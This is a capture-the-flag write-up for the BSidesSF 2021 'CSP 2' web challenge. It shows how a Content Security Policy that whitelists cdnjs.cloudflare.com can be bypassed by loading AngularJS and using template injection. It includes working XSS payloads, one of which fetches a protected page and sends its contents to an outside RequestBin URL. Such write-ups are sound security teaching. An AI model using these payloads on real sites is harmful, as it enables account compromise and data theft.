Rating:

Check out [https://fadec0d3.blogspot.com/2021/03/bsidessf-2021-web-challenges.html#csp-2](https://fadec0d3.blogspot.com/2021/03/bsidessf-2021-web-challenges.html#csp-2) for writeup with images.

---

This challenge was simmilar to the last one where we need to send an XSS
payload to an admin to get the flag.

Checking the CSP this time we have:

```javascript
script-src 'self' cdnjs.cloudflare.com 'unsafe-eval'; default-src 'self' 'unsafe-inline'; connect-src *; report-uri /csp_report
```

This one has the issue of using `script-src` from cdnjs.cloudflare.com. If we can
use a script from CloudFlare to execute arbitrary JS, we win!

To do this we can use Angular to evaluate JS within an Angular context.
Here's a simple example to test:

```javascript
<script src=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.7.0/angular.min.js></script>
<x ng-app>{{$new.constructor('alert(1)')()}}
```

This payload seems to work!

Now we just need to exfiltrate the flag like the last challenge using fetch.

```javascript
<script src=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.7.0/angular.min.js></script>
<x ng-app>{{$new.constructor('fetch("/csp-two-flag").then(x => x.text()).then(t => fetch("https://requestbin.io/1m40bkh1?x=" + t))')()}}
```

Then we get the Flag on RequestBin:

```
CTF{Can_Still_Pwn}
```

Original writeup (https://fadec0d3.blogspot.com/2021/03/bsidessf-2021-web-challenges.html#csp-2).